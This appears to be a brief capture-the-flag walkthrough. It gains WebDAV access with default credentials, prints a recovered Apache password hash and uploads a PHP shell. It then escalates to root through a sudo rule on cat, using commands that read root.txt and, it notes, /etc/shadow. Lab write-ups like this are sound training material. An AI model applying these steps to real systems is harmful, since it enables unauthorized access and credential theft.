# Tasks
1. user.txt
2. root.txt


# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION  
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))  
|_http-title: Apache2 Ubuntu Default Page: It works  
|_http-server-header: Apache/2.4.18 (Ubuntu)
```

# Findings
## Web (80)
- Apache 2.4.18
- Found `/webdav` but 401.
- Found this article on [webdav bypass](http://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html)
- We can login using default creds using cadaver
`wampp:xampp`
- Contains passwd.dav
```bash
dav:/webdav/> ls  
Listing collection `/webdav/': succeeded.  
       passwd.dav                            44  Ogos 26  2019  
       user.txt                              33  Sep  5 15:17
```
- We can also upload files to the server.
- `passwd.dav` contains hash for user wampp.
`wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91`
- Hash type is `Apache $apr1$`, mode 1600
- While cracking hash, we can try for a reverse shell.

# Foothold

- We can upload a shell.php to the server and we can call it
- We are now user www-data.
- Other user is merlin

# Privilege Escalation
- www-data sudo -l
```bash
User www-data may run the following commands on ubuntu:  
   (ALL) NOPASSWD: /bin/cat
```
According to gtfobins, we can read any files we want since we're running as root.
```bash
LFILE=/root/root.txt
sudo /bin/cat "$LFILE"
```
We can now read root.txt, this can be done also to read `/etc/shadow` to get hashes for users.

